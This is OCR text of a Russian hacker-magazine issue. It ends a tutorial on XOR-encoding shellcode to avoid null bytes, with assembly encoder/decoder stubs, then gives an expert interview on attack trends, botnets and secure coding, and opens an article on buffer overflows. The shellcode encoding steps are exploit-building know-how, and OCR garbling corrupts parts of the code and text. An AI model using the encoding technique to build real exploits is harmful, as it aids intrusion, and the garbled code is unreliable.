ADD_KEY , ав процедуре дешифров- 
ки - строчку: add bl, -ADD_KEY, и тогда 
для шифрования понадобится лишь 
один байт - XOR_KEY. Теперь, как я и 
обещал, поговорим о байтах ADD_KEY 
и XOR_KEY. Эти два байта представ- 
ляют собой ключи, с помощью кото- 
рых мы зашифровываем и расшиср- 
ровываем. Их надо подобрать так, 
чтобы зашифрованное тело °Ве!-кода 
не содержало нулевых байт. Как это 
сделать? Большинство хакеров под- 
бирают эти ключи методом научного 
тыка или пишут программы, которые 
находят нужную пару байт простым 
перебором. Этот способ работает в 
большинстве случаев, хотя он немно- 
го глуп. Поэтому я придумал, как 
шисфровать эксплоиты любой длины с 
помощью последовательного приме- 
нения нескольких ХОБ'ов. Я не буду 
объяснять здесь общую идею - она 
требует знания дискретной теории 
групп и немного сложна для вступи- 
тельной статьи. Расскажу лишь о 
двух простых правилах, вытекающих 
из нее (в обоих правилах использует- 
ся лишь XOR, ADD отдыхает). 
Правило 1. Если тело $Ве!-кода мень- 
we 256 байт и оно содержит нулевые 
байты, в качестве ключа XOR_KEY 
нужно брать байт, который ни разу не 
встречается в теле shell-Koga. Такой 
байт обязательно найдется, ведь тело 
слишком короткое и не может содер- 
жать в себе 256 разных байт :-). К то- 
му же, этот байт будет ненулевым. 
Правило 2. Если тело shell-koga 
меньше 510 байт и оно содержит ну- 
левые байты, то следует ксорить чет- 
ные и нечетные байты тела отдельно. 
Сначала смотрим на нечетные байты 
(первый, третий, пятый и т.п.), четные 
пока не трогаем. Если среди них есть 
нулевые байты, то в качестве ключа 
XOR_KEY_EVEN берем байт, который 
среди них не встречается. Как и в пер- 
вом случае, такой байт обязательно 
найдется, так как количество нечет- 
ных байт в теле shell-Koga меньше, 
чем 256. Шифруем этим ключом толь- 


ко нечетные байты и записываем в го- 
nosy shell-koga процедуру их дешиср- 
ровки. Потом смотрим на четные бай- 
ты и делаем то же самое с ними: 


Примерный код процедуры шифровки не- 
четных байт 


; вах - адрес тела 
; есх - его длина 

mov edx, eax 

dec edx 

add edx, есх; теперь в ebx - адрес конца 
тела $пе!-кода 

@@2: mov bi, byte ptr[eax] ; читаем оче- 
редной нечетный байт тела в bl 

xor bl, XOR_KEY_EVEN ; ксорим его на 
XOR_KEY_EVEN 

mov byte ptr[eax], bl ; записываем зашиф- 
рованный байт в тело 

inc eax 

inc еах; перемещаем указатель Ha следу- 
ющий нечетный байт тела 

cmp eax, edx ; достигнут ли конец тела 
зпе|-кода? 

jng @@2; нет! 

ret 


Соответственно, расшифровывать 
будем так: 


exploit_head: 

хог есх, есх 

mov cl, expl_end-expl_start; в есх - длина 
тела 

mov eax, esp 

add eax, expl_start-exploit_head; в eax - 
указатель Ha тело 

mov edx, eax 

dec edx 

add edx, ecx; в edx - адрес конца тела 

; процедура дешифровки полностью 
совпадает с процедурой шифрования - 
в этом и состоит вся прелесть XOR! ;-))) 
@@2:mov bl, byte ptr[eax] 

xor bl, XOR_KEY 

mov byte ptr[eax], bl 

inc eax 

inc eax 

cmp eax, edx 

jng @@2 

ret 

; здесь может быть процедура для pac- 
шифровки 

; четных байт (если она нужна). 
expl_start: 

‚ Тугнаходится Teno shell-Koga 


expl_end dd 0 


Второе правило допускает вариации. 
Например, можно не шифровать снача- 
ла каждый нечетный, а потом каждый 
четный байт, а разделить тело shell-kKo- 
да на две равные половинки. Длина 
каждой половинки будет меньше, чем 
255 байт, дальше см. правило 1. 

Ну, вот и все. Теперь ты немного 
знаком с основными принципами на- 
писания shell-Koga и, думаю, воору- 
женный этими знаниями, не натк- 
нешься на стандартные грабли shell- 
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последнее время учас- 


тились случаи взлома 


интернет-серверов, за- 


нимающихся электрон- 
ной коммерцией. Сов- 

местимы ли вообще понятия 

"eCommerce" и "безопасность"? 


ДЛ: Почему бы и нет? Это обычные 
электронные сервисы, в принципах 
защиты которых нет ничего экстраор- 
динарного. Просто в этой области все 
проблемы проявляются гораздо ост- 
рее по причине того, что работа идет с 
"живыми деньгами" и цена ошибки 
достаточно высока. К тому же, в пос- 
леднее время предпочитают атако- 
вать не серверы, а пользователей, 
поскольку с ростом популярности ус- 
луги средняя квалификация пользо- 
вателей снижается и уловки типа по- 
пулярного "сришинга" проходят го- 
раздо проще. 


Насколько актуальна сегодня проб- 
лема сетевых атак для современного 
бизнеса? 


ИМ: Давайте посмотрим на эту проб- 
лему под определенным углом зре- 
ния. Это как айсберг. К надводной 
части можно отнести вирусы и сете- 
вые черви - они на виду. Ущерб от 
них достаточно велик, проблема ви- 
русов, безусловно, актуальна для бе- 
зопасности бизнеса. Но гораздо 
больший вред несет подводная часть 
айсберга, которая сулит серьезней- 
шие проблемы современному бизне- 
Су, - я имею в виду взлом корпоратив- 
ных ресурсов на заказ. Сейчас об 
этом говорят мало, но это вовсе не 
означает, что проблемы нет. Речь 
идет о таком элементе конкурентной 
борьбы большого бизнеса, как орга- 
низация удаленной атаки для про- 
никновения в корпоративную сеть 
конкурента с целью получения той 
или иной конфиденциальной инфор- 
мации. Я по роду деятельности посто- 
янно встречаюсь с подобными CpakTa- 
ми, которые сегодня стали практичес- 
ки нормой в жестокой конкурентной 
борьбе. Сейчас, когда задача удален- 
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ного проникновения сильно упрости- 
лась из-за избыточной функциональ- 
ности современных систем, эта проб- 
лема стала чрезвычайно актуальна 
для бизнеса. Мы это наблюдаем по 
экспоненциальному росту числа 
запросов в нашу компанию для ор- 
ганизации теста на проникновение с 
целью проверки реальной защи- 
щенности сетевых ресурсов компа- 
нии от возможной атаки конкурен- 
тов (или иных злоумышленников) из 
интернета. 


Насколько надежно защищены ин- 
формационные системы компаний OT 
интернет-атак? 


ИМ: От скрипт-кидди - еще куда ни 
шло. От остальных, особенно профес- 
сионалов высокого класса, - крайне 
плохо. И это мы регулярно наблюдаем 
при проведении тестов на проникно- 
вение, когда практически 100% наших 
атак становятся успешными. Основная 
проблема состоит в нежелании бизне- 
са понимать, к каким убыткам все это 
может привести, и, как следствие, - не- 
желание выделять средства на безо- 
пасность. Но ситуация активно меняет- 
ся с каждым днем: все больше компа- 
ний начинают уделять серьезное вни- 
мание вопросам обеспечения ИБ. 


Знаете ли вы компании, которые не- 
уязвимы перед атаками? 


АЛ:К сожалению (а может, к 
счастью), таких компаний не сущест- 
вует. Даже те организации, которые 
обрабатывают очень и очень критич- 
ную информацию и должны защи- 
щать ее от хакерских воздействий, 
постоянно взламываются. Пентагон, 
НАСА, правительство - все они пост- 
радали от рук злоумышленников. Да- 
же лаборатории, занимающиеся 
ядерным вооружением, и атомные 
электростанции и то не раз станови- 
лись жертвами хакеров. Не все глад- 
ко и в стане компаний, предлагающих 
свои продукты и услуги по защите 
информации, которые, казалось бы, 
должны трепетно относиться к своей 
защищенности. Известны случаи 
взлома компаний Symantec, еЕуе, 
McAfee, eSafe и т.д. Ну о какой тут 
неприступности можно говорить? 


Каковы тенденции развития совре- 
менных атак? 


о: Основное отличие современных 
атак заключается в том, что они вост- 
ребованы рынком, как ни странно это 
звучит. Есть постоянный спрос, кото- 
рый можно выразить в деньгах, на 


Практически 100% наших атак становятся 
успешными. 


НАШ ЭКСПЕРТ 


Ш Дмитрий Леонов (di@bugtraq.ru) - создатель 
проекта BugTrag.Ru (www.bugtraq.ru), соавтор 


книг "Атака на Интернет" 


"Атака из 


Интернет", кандидат технических наук, доцент 


РГУ нести и газа. 


НАШ ЭКСПЕРТ 


Ш Илья Медведовский - кандидат технических 
наук, директор компании Digital Security 
(www.dsec.ru). Один из ведущих в России экс- 
пертов по информационной безопасности. Ав- 
тор серии книг "Атака на Интернет" и много- 


численных статей и публикаций в различных 
журналах. Ведущий разработчик системы ана- 
лиза и управления информационными рисками 
ГРИФ (www.dsec.ru/soft/grif.php) и системы 


никновения в информационные сис- 
темы. Я говорю о возможностях про- 
никновения через почтовые системы 
и через обычный веб-браузер (из-за 
избыточной сункциональности и 
неправильной настройки последних), 
а также о современной технологии 
реверсивных троянов - об этом не- 
давно писали в "Компьютерре" 
(http://www.dsec.ru/articles/iexploiter.php). Co- 
вокупность этих факторов позволяет 
сегодня организовать успешную ата- 
ку на корпоративную сеть, которую 


управления политикой информационной безопасности КОНДОР 
(www.dsec.ru/soft/kondor.php). 


взломанные компьютеры. Поэтому в 
первую очередь имеют место прокси 
и трояны для рассылки спама и кар- 
дерства. В связи с этим атаки все 
больше приобретают автоматический 
характер и, с улучшением качества 
домашнего интернета, направлены на 
наименее защищенную часть сети - 
домашних пользователей. В области 
атак на корпоративные сети процве- 
тает промышленный шпионаж. С тех- 
нической точки зрения, развиваются 
два направления - атаки на клиен- 
тские компьютеры и использование 
альтернативных методов доступа в 
сеть, таких, как VPN, Wi-Fi и т.п. Атаку- 
ющие все активнее используют те же 
средства, что и лица, защищающие 
сеть: криптографию, стеганографию, 
внедрение в ТСВ, туннелирование 
трафика. Чего я уже давно жду, так 
это массового вируса, написанного с 
использованием технологий rootkit, 
подобного тому который описан в 00- 
ном рассказе 
(http://www.securitylab.ru/43445.html). Инте- 
ресно будет посмотреть на лица про- 
изводителей антивирусных программ. 


BM: Ha мой взгляд, тенденции раз- 
вития всех технологий примерно оди- 
наковы: использование старых нара- 
боток, унификация и сокращение 
числа ручных операций за счет авто- 
матизации. Как происходит среднес- 
татистический взлом? Для начала 
взломщик изучает (при помощи раз- 
личных сканеров, чаще всего, птар) 
установленный на интересующем его 
объекте софт (операционка, откры- 
тые порты, версии висящих на них 
демонов и т.п.) и ищет готовый 
эксплоит под него. К счастью, д0- 
вольно большой процент сходит с 
дистанции уже на этом этапе, пос- 
кольку либо не находит нужный 
эксплоит, либо попросту не может 
скомпилировать его из исходника. Ес- 
ли воспользоваться старой наработ- 
кой не удалось, то обладающий соот- 
ветствующей квалификацией взлом- 
щик попытается создать свой экспло- 
ит. Для этого не нужно быть гением - 
методика поиска buffer overflow goc- 
таточно подробно описана (есть даже 
готовые утилиты), равно как и мето- 
дика написания $Пе!-кодов. Мне ка- 


жется, что следующим "этапом эво- 
люции" станет появление средств ти- 
na "exploit builder", при помощи кото- 
рых любой желающий сможет 
конструировать эксплоиты под свои 
нужды, обладая самыми минимальны- 
ми познаниями в программировании 
и сетевых технологиях, как это прои- 
зошло относительно недавно с 
конструкторами вирусов. Правда, та- 
кой технологический прорыв будет 
обоюдоострым: если методика поиска 
ошибок будет полностью формализо- 
вана, ей с тем же успехом будут поль- 
зоваться и разработчики. Другим не 
менее перспективным направлением 
является социальная инженерия, ибо 
глупость человеческая и доверчи- 
вость неистребимы. Кроме того, ис- 
пользование человеческого сфрактора 
позволяет иногда проникнуть даже 
за очень хорошо настроенный fire- 
wall, когда чисто технические методы 
оказываются бессильными. 


ИМ: Парадокс в том, что сегодня 
многие специалисты до сих пор не за- 
мечают, насколько изменился мир ин- 
срормационных технологий. Сейчас 
мы переживаем подлинную револю- 
цию в области новых технологий про- 


еще несколько лет назад можно бы- 
ло бы справедливо считать абсолют- 
но защищенной. С примером подоб- 
ной, ставшей сегодня возможной ата- 
ки, которую мы выполнили в процес- 
се тестов на проникновение, можно 
ознакомиться по ссылке 
http://www.dsec.ru/services/pt_rep2.php. Ду- 
маю, этот пример говорит сам за себя. 
Сейчас мы переживаем момент, когда 
концепция централизованной сете- 
вой защиты периметра от удаленных 
атак умерла. То есть наличие межсе- 
тевого экрана стало необходимым, но 
не достаточным условием надежной 
сетевой защиты от внешних воздей- 
ствий. Сегодня свершилось то, о чем 
мы давно предупреждали бизнес, - 
пришло время для защиты от интер- 
нет-атак заниматься обеспечением бе- 
зопасности каждой рабочей станции и 
учитывать человеческий срактор при 
разработке эрорективной политики 
информационной безопасности. 
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Меняется ли объект атак? 


Несомненно. Два-три года назад 
мишенью для большинства атак слу- 
жили сетевые службы, и целью ата- 
ки, как правило, было получить пол- 
ный контроль над удаленной систе- 
мой. Проблемы безопасности на себе 
испытывали преимущественно корпо- 
ративные пользователи. Сегодня ата- » 


Мы переживаем подлинную революцию в 
области новых технологий проникновения 
в инсформационные системы. 


НАШ ЭКСПЕРТ 


Ш Алексей Лукацкий (luka@infosec.ru) - руково- 
дитель отдела интернет-решений компании "ИН- 
ФОРМЗАЩИТА" (www.infosec.ru). Автор книг 
"Обнаружение атак", "Атака из Internet", 


"Protect Your Information With Intrusion 
Detection", а также более 200 статей no инфор- 
мационной безопасности. Является модератором 
эхи RU.SECURITY в сети FIDO и автором курсов 


"Введение в обнаружение атак", "Системы обнаружения атак" и 
"Реагирование на атаки". Сертифицированный инструктор по безо- 
пасности компании Internet Security Systems (www.iss.net). 
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"НЕУЯЗВИМЫХ СИСТЕМ НЕ СУЩЕСТВУЕТ!" в 


ки на сетевые сервисы составляют 
лишь крайне небольшой процент, 
причем среди них большую часть за- 
нимают атаки на отказ в обслужива- 
нии. Большая часть инцидентов свя- 
зана с клиентским программным 
обеспечением, и страдают, в основ- 
ном, небольшие организации и част- 
ные пользователи. Следует отметить 
также то, что в большинстве атак в 
той или иной степени используются 
приемы социальной инженерии, при- 
чем именно эти приемы постоянно со- 
вершенствуются. 


С чем связана смена направленнос- 
ти атак? 


Причин несколько. Во-первых, бе- 
зопасности серверных систем тради- 
ционно уделяется больше внимания, 
поэтому они не являются слабым 
звеном. Во-вторых, меняется мотива- 
ция атак. Любимые Голливудом атаки 
- квалифицированный взломщик це- 
ленаправленно получает доступ к за- 
секреченным документам какой-либо 
компании - всегда были редки. Обыч- 
но большая часть атак проводилась 
либо из спортивного интереса, либо 
по каким-то личным мотивам. Сейчас 
подавляющая часть атак проводится 
с целью получения прибыли. Взло- 
манный компьютер может использо- 
ваться как узелок в огромной сети, 
состоящей из десятков тысяч "зомби- 
рованных" машин, а сеть, в свою оче- 
редь, применяется для рассылки спа- 
ма, размещения нелегального кон- 
тента (например, порнограсфии) или 
организации распределенных атак. 
Существует большой рынок подоб- 
ных "зомбированных" машин, причем 
с очень большим спросом, так как 
для рассылки спама, например, но- 
вые машины нужны постоянно. Могут 
быть и другие цели атаки - от относи- 
тельно невинных, например, измене- 
ние стартовой и поисковых страниц 
браузера (для накрутки посещаемос- 
ти сайта, впаривания рекламы и 
привлечения посетителей на платные 
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offtopic (offtopic@mail.ru) - специалист в об- 
ласти безопасности корпоративных сетей, пос- 
тоянный автор и модератор форумов проекта 


www.securitylab.ru, сертифицированный систем- 
ный инженер Microsoft (MCSE) по NT 
4.0/2000/2003, сертифицированный препода- 
ватель Microsoft (MCT). 


Обычно большая часть атак проводилась 
либо из спортивного интереса, 
пибо по каким-то личным мотивам. 


ресурсы), изменение номера модем- 
ного соединения (развод пользовате- 
ля на оплату междугородних разгово- 
ров по платному номеру), до хищения 
информации с кредитных карточках. 
Клиентское программное обеспече- 
ние становится идеальной мишенью 
для атакующих, так как имеет широ- 
кое распространение, что позволяет 
взламывать огромное количество ма- 
шин, которые зачастую еще и безгра- 
мотно настроены. Кстати, во многих 
корпорациях меры по обеспечению 
безопасности клиентских систем час- 
то ограничиваются только установ- 
кой антивирусного ПО. 


Ведет ли это к неминуемому концу 
интернета, как предрекают некоторые 
профессионалы? 


Рано или поздно интернету в его 
нынешнем виде придет конец, но 
вряд ли основной причиной станут 
сетевые атаки. Причиной подобных 
прогнозов стала именно близору- 
кость породивших их, так как за ко- 
личественными изменениями не бы- 
ли замечены качественные, о кото- 
рых идет речь, - атаки обрели моти- 
вацию и нашли для себя новую ни- 


Sasser и MSBlast вполне могли бы нанести 
значительно больший урон, если бы они 
содержали деструктивные функции. 
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Ш Владислав 


Мяснянкин 


(www.free- 


unices.org/~cyberviad) - эксперт по информацион- 


ной безопасности. Специалист по защите теле- 
коммуникаций, криптографии и обманным систе- 
мам. Автор ряда публикаций по различным аспек- 
там безопасности. Переводчик книги С. Гарфин- 
келя "Все под контролем". 
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шу. Сейчас "ресурс" этой ниши 6nu- 
зок к исчерпанию. Кроме того, произ- 
водители клиентского программного 
обеспечения в корне изменили под- 
ход к его разработке, поставив тре- 
бования безопасности на одну из 
первых позиций (для серверных сис- 
тем тоже наблюдалось нечто подоб- 
ное во второй половине 90-х), и, 
главное, стараются снять решение 
этого вопроса с пользователя (даже 
go консервативного Microsoft Hako- 
нец дошло, что не только средний 
пользователь, а даже средний адми- 
нистратор не может решить вопрос 
обеспечения безопасности в силу 
своей некомпетентности). Однако 
пройдет еще достаточно много вре- 
мени, прежде чем будут ощущаться 
результаты. Рискну предположить, 
что существенного роста количества 
инцидентов в ближайшее время не 
должно, при этом уже через год мож- 
но ожидать его снижения, а вот че- 
рез три года произойдет возврат на 
уровень двухгодичной давности. 


Можно ли вывести из строя весь ин- 
тернет или большую его часть? 


ДЛ: События последнего года пока- 
зали, что технически такое вполне 
возможно. Другое дело - вопрос мо- 
тивации атакующих. К примеру, если 
говорить о вирусах, то Sasser и 
MSBlast вполне могли бы нанести 
значительно больший урон, если бы 
они содержали деструктивные функ- 
ции. Но нынешним вирусмейкерам 
уже не очень интересно заниматься 
чистым деструктивом, тем более что 
таким образом будет уничтожаться и 
их среда существования. Вместо вы- 
ведения из строя сервера или поль- 
зовательской системы гораздо про- 
дуктивнее заставить работать его на 
себя, превратить его в зомби. И это 
второй источник проблем, едва ли не 
более опасный, чем атаки, использу- 
ющие либо уязвимости в программах, 
как Sasser, либо уязвимости в голо- 
вах, как большинство почтовых виру- 
сов. Фактически в руках владельцев 


НАШ ЭКСПЕРТ 


зомби появляется мощная распреде- 
ленная система, способная эфорек- 
тивно решать самые различные зада- 
чи. Естественно, в первую очересь в 
голову приходят деструктивные воз- 
можности такой системы, примеров 
предложения услуг для выведения 
из строя неугодных серверов уже 
предостаточно. Но есть сильное по- 
дозрение, что гораздо выгоднее ис- 
пользовать ее для элементарной рас- 
сылки спама. Как я сказал выше, це- 
ленаправленное использование по- 
добного инструмента для выведения 
из строя всей сети означает для ата- 
кующих выбивание почвы у себя из- 
под ног. 


Да, все еще можно вывести из 
строя если и не весь интернет, то 
достаточно большую его часть. Од- 
нако и структура сервисов интернета 
тоже становится все более и более 
распределенной, а это позволяет 
исключить единую точку сбоя, атака 
на которую могла бы вывести из 
строя всю сеть. 


МК: По моему мнению, вывести из 
строя интернет нельзя. Интернет - это 
совокупность интернет-провайдеров 
разного размера и уровня. Многие 
сегменты интернета обслуживаются 
крупными телекоммуникационными 
компаниями и являются важной сос- 


тавляющей бизнеса этих компаний. 
Примерами таких компаний могут слу- 
жить все известные телекоммуника- 
ционные компании, такие, как Бритиш 
Телеком, Дейтч Телеком, Спринт, 
Транстелеком. И подход к обеспече- 
нию работоспособности интернета у 
этих компаний соответствующий. У 
них существуют требования и шабло- 
ны по правильной настройке обору- 
дования с точки зрения защиты, от- 
делы мониторинга и расследования 
инцидентов, специальные техничес- 
кие средства для обнаружения и бпо- 
кирования атак типа "отказ в обслу- 
живании". А вот маленькие операто- 
ры, обслуживающие небольшие ку- 
сочки низшего уровня нашей люби- 
мой всемирной сети, не в состоянии 
реализовать все вышеизложенное. 
Именно поэтому много проблем испы- 
тывают пользователи маленьких go- 
машних сетей и мало - абоненты 
крупных операторов. 


Почему до сих пор в сетевых прото- 
колах находятся дыры, используемые 
для реализации атак? 


МК: Вообще встречаются дыры 
двух основных типов. Первый - это 
ошибки реализации, а второй - не- 
достаточная проработанность самих 
протоколов с точки зрения безопас- 
ности. Что касается первого типа, 


Интернет - это совокупность интернет- 
провайдеров разного размера и уровня. 
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ЧИТАЙ 
«ПУТЕВОДИТЕЛЬ»! 


ЖУРНАЛ 
ПРОХОЖДЕНИЙ 

И КОДОВ ДЛЯ 
КОМПЬЮТЕРНЫХ ИГР 


* 128 полос исчерпывающей информации об играх 
. Более 1500 чит-кодов 


* СО-диск с видеоуроками и базой кодов и прохождений 


+ Двухсторонний постер с детальными картами 
уровней и тактическими схемами 


+ Прикольная наклейка с кодами 


то, как говорил Брюс Шнайер, автор 
известнейшего труда "Прикладная 
криптография", современный прог- 
раммист делает на 1000 строк ис- 
ходного кода 14 ошибок. Конечно, в 
процессе отладки программных 
продуктов это количество удается 
уменьшить, но полностью изба- 
виться ошибок даже теоретически 
невозможно. Относительно второго 
типа тут дело в том, что практичес- 
ки все сетевые протоколы разраба- 
тывались для того, чтобы обеспе- 
чить наиболее простое, удобное и 
легко реализуемое взаимодействие 
между сетевыми абонентами. То 
есть, по сути дела, разработчики 
стандартов вспомнили о функциях 
безопасности в сетевых протоколах 
только тогда, когда было уже позд- 
но. Они попробовали исправить это 
сразу в рамках работы над протоко- 
лом [Руб, но пока такое возможно 
только в далеком светлом будущем. 
Поэтому сейчас существуют стан- 
дарты, которые могут быть прило- 
жены к существующим сетевым 
протоколам для повышения их бе- 
зопасности. В первую очередь, это 
IPSsec, SSL/TLS и SSH. Использова- 
ние этих протоколов позволяет 
скрыть большинство недостатков 
других протоколов в рамках стека 
ТСРЛР. При этом внедрение их 
сильно сдерживается как техничес- 
кими требованиями, например, тре- 
бованиями по производительности 
и масштабируемости, так и слож- 
ностями на 9-м уровне модели вза- 
имодействия открытых систем (ор- 
ганизационно-политическом). Поэ- 
тому продолжаться это будет веч- 
но, так как в "войне щита и меча" 
не может быть победителя в прин- 
ципе. И основная задача любой 
системы безопасности в том, чтобы 
создание меча было экономически 
неэффективным, а создание щита - 
наоборот. А вот это уже вполне 
достижимо при грамотном исполь- 
зовании современных технологи- 
ческих наработок и решении проб- 
лем 9-го уровня. 


Можно ли сказать, что соблюдение 
правил создания защищенного кода 
снимет все проблемы с безопас- 
ностью? 


ДЛ: Это слишком оптимистичное 
утверждение. Правила создания за- 
щищенного кода могут помочь спра- 
BUTbCH с глупыми типовыми ошибка- 
ми. В конце концов, сколько же мож- 


но наступать на одни и те же грабли 
с переполнением буфера или SQL 
Injection? Можно подумать, искоре- 
нение их в своем коде - какое-то вы- 
сокое искусство, а не элементарная 
техника программирования. Но даже 
после их устранения останутся логи- 
ческие ошибки, которые значитель- 
но труднее отловить, неудачная 
оценка возможностей масштабиро- 
вания и, разумеется, человеческий 
фактор, способный перечеркнуть 
все усилия программистов. Если для 
распространения вируса нужно, что- 
бы получатель письма распаковал 
запароленный архив и вручную за- 
пустил программу, и находятся люди, 
которые все это проделывают, то о 
каком устранении проблем с безо- 
пасностью можно говорить? 


Можно ли выделить основную проб- 
лему с безопасностью в современных 
компаниях? 


BM: Да, и она стара как мир, это че- 
ловеческий фактор. Пень и естест- 
венное желание человека упростить 
себе жизнь делают дырявой самую 
совершенную систему технической 
защиты. 


А можно ли создать систему, кото- 
рая обнаруживала бы все возможные 
атаки? 


АЛ:Как говорится в рекламе, "нет, 
сынок, это фантастика". Математичес- 
ки доказана как бесконечность мно- 
жества атак, так и возможность соз- 
дания атаки, которая не будет гаран- 
тированно обнаружена средствами 
защиты. Например, несмотря на все 
заявления производителей антивиру- 
сов, стопроцентное обнаружение не- 
известных вирусов в их системах - это 
миф. Если бы это действительно бы- 
ло так, то зачем было бы ежедневно 
обновлять свои антивирусные базы и 
требовать ежегодную оплату подде- 
ржки своих продуктов? 


Можно ли поймать хакера, что назы- 
вается, "за руку" и какими навыками 
для этого надо обладать? 


BM: Этот вопрос относится к разря- 
ду вечных. С одной стороны, любое 
действие оставляет следы. С другой - 
обнаружить, зафиксировать и пра- 
вильно интерпретировать эти следы - 
задача нетривиальная, особенно в 
интернете, где для этого может пот- 
ребоваться взаимодействие множе- 


Разработчики стандартов вспомнили 
о функциях безопасности в сетевых 
протоколах только тогда, 
когда было уже NO3GHO. 


Для взлома и защиты нужны разные 
навыки (как для диверсанта 
и пограничника). 


ства людей в разных точках планеты. 
Американская домохозяйка, чей 
подключенный к интернету по ADSL 
Windows взломали и использовали в 
качестве анонимного прокси, или 
старшеклассник из Новопропойска, 
поставивший Linux опять-таки с тор- 
чащими наружу прокси, вряд ли смо- 
гут помочь, даже если захотят. Поэ- 
тому остается надеяться на собствен- 
ные силы и ресурсы (логи фаервола 
и приложений), систему обнаруже- 
ния атак и т.п. Существует мнение, 
что защитник должен обладать на- 
выками не хуже, чем у атакующего. 
На самом деле для взлома и защиты 
нужны разные навыки (как для ди- 
версанта и пограничника). Для поим- 
ки "за руку", кроме чисто компьютер- 
ных знаний, нужно иметь аналити- 
ческие способности и владеть осно- 
вами законодательства, поскольку, 
даже если картина "электронного 
боя" однозначно ясна пострадавше- 
му админу, не факт, что собранные 
им распечатки логов и выводы будут 
приняты судом. 


Кстати, что касается Windows. Прав- 
да ли, что на решениях Microsoft мож- 
но построить защищенную от взлома 
систему? 


О. Нет. Обман, пропаганда Билли 
Гейтса :). Конечно же, можно, в рам- 
ках определенного технического за- 
дания и сметы. В целом, выбор плат- 
формы при построении защищенной 
системы - далеко не решающий cpak- 
тор. Более того, обычно он не входит 
в компетенцию специалиста в облас- 
ти безопасности. То есть ты защища- 
ешь систему на основе каких-то про- 
дуктов, а не выбираешь, из чего бы 
такого "защищенного по умолчанию" 
ее построить. Я с группой товарищей 
(ЗАРАЗой и Pig Killer) давно собира- 
юсь организовать конкурс по взлому 
веб-сервера на основе "непатченно- 
го" W2K+IIS 5.0 или \/2КЗ+И$ 6.0, в 
образовательных целях :). 


Что надо сделать для защиты 
М/Ипаом/5-системы? 


О. Для большинства ситуаций goc- 
таточно прочитать, осмыслить и вы- 
полнить рекомендации, опублико- 
ванные на сервере Microsoft 
(www.microsoft.com/technet/security/default.m 
spx). Домашнему пользователю 
вполне хватит рекомендаций типа 
"Три шага для защиты вашего 
компьютера" 
(www.microsoft.com/Rus/Security/Protect/Defau 
\Lmspx), хотя я бы дополнительно по- 


советовал либо отказаться от IE, ли- 
бо выполнить в нем Lockdown зоны 
безопасности Му Сотрщег. Естест- 
венно, не стоит слепо следовать лю- 
бым, даже самым лучшим рекомен- 
дациям. 


Правда ли, что фаерволы и другие 
самостоятельные средства защиты 
скоро исчезнут, а им на смену придут 
защищенные ОС, маршрутизаторы и 
T.g., то есть средства защиты станут 
неотъемлемой частью !Т-инфраст- 


руктуры? 


мк: "Смешно ли это? Ответа нету" 
(С) Кирпичи. Нельзя забывать о том, 
что помимо функциональных воз- 
можностей существуют вопросы 
простоты внедрения, администриро- 
вания, построения отказоустойчи- 
вых дизайнов, необходимость раз- 
деления полномочий и т.п. Пример: 
за серверы отвечает департамент 
автоматизации, за межсетевые эк- 
раны - департамент информацион- 
ной безопасности. Вопросы: кто бу- 
дет отвечать за функционирование 
программных межсетевых экранов, 
работающих непосредственно на 
серверах и как построить регламент 
взаимодействия? Или другой при- 
мер: мы знаем, что наши серверы в 
центре обработки данных не долж- 
ны обслуживать протокол ЕТР. У 
этой задачи два варианта решения. 
Настраиваем фильтры (межсетевые 
экраны) на каждом сервере. И сразу 
всплывает парочка недостатков. 
Первый из них - фильтрация будет 
жрать ресурсы сервера, нужные нам 
для других задач. Второй - измене- 
ние политик безопасности будет 
требовать перенастройки множест- 
ва серверов, желательно быстро. 
Установка перед этими серверами 
межсетевого экрана позволяет под- 
нять производительность и снизить 
расходы на администрирование. По- 
этому особой веры в то, что защи- 
щенные операционные системы за- 
менят специализированные cpeg- 
ства обеспечения безопасности, 
нет. А вот интеграцию специализи- 
рованных средств безопасности не- 
посредственно в сетевую инфраст- 
руктуру надо признать свершив- 
шейся. Именно это позволяет макси- 
мально эффективно реализовать 
механизмы контроля доступа сразу 
на границе сети, а также обеспечить 
построение различных зон безопас- 
ности и эффективную защиту цент- 
ров обработки данных. 


0 КОМПЬЮТЕРНОМ 
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УЧИМСЯ ГРАМОТНОЙ РАБОТЕ С ПАМЯТЬЮ 


щерб от ошибок и недосмотров программистов при работе с памятью огро- 

мен. Взять хотя бы всем известный MS Windows (В): в последнее время 
большая часть патчей к нему связана как раз с устранением последствий кри- 
вой работы с памятью и переполнения буфера. Давай попробуем во всем ра- 
зобраться, чтобы в будущем этого избежать. 


НЕПРАВИЛЬНЫЙ 


ДОСТУП И 


и Рассмотрим для примера 
функцию, добавляющую одну 
строку в конец другой, strcat(sl, $2). Допус- 
тим, в начале программы мы сделали так: 
char *$1 = malloc(2); пегтзе{($1, 0, 2), выделив 
строке $1 два байта и обнулив их. Теперь, ес- 
ли, например, $гсаК$1, "JOO г Own3d"), функ- 
ция честно скопирует строку "/ОО г Own3d" 
по адресу, на который указывает $1. Ведь str- 
cat не знает о том, что наша программа выде- 
лила всего два байта под $1! Поэтому она 
просто перезапишет чужие данные, запол- 
нив их куском нашей строки. В данном слу- 
чае это не очень критично. 

Однако вот такой код уже может прилично 
навредить: 


Отличие данного варианта от описанного 
выше в том, что в здесь $2 будет указывать 
на область, следующую сразу же за $1. И по- 
этому $гса $1, "JOO г Own3d") с радостью ne- 
резапишет строку, хранящуюся в $2, даже не 
заметив этого :-). 

В таком случае опасность не особо велика 
и заключается только в том, что пользова- 
тельские данные могут быть утеряны и прог- 
рамма просто начнет себя странно вести. Но 
могут произойти и более занятные вещи. 


Рассмотрим срункцию strlen, которая подс- 
читывает количество символов в строке. 
Предположим, что она перебирает символы 
go тех пор, пока не встретит ноль - он будет 
означать, что строка закончилась. Также бу- 
дем считать, что у нас есть указатель на 
строку $1, для которой мы выделили сто байт. 
Давай забудем проинициализировать выде- 
ленную память нулями. Затем сделаем ${г- 
сру($1, "hello world") и посчитаем длину на- 
шей строки: $еп($1) честно пробежится по 
словосочетанию "hello world" и пойдет счи- 
тать дальше, пока не встретит ноль. В луч- 
шем случае программа выдаст неправильное 
значение и все дальнейшие расчеты будут, 
мягко говоря, неточны :-). А в худшем? 

Наша бравая функция смело пробежит вы- 
деленные строке 100 б и пошлепает дальше, 
где наверняка в один прекрасный момент по- 
пытается прочитать байт, на чтение которого 
она прав не имеет. Любая система тотчас не- 
одобрительно отреагирует на подобную наг- 
лость, а УМХ-система сразу же пошлет про- 
цессу сигнал SIGSEGV и грохнет его. В ре- 
зультате чего пользователь увидит заветное 
"Segmentation fault". 


Теперь обсудим такой пример: 


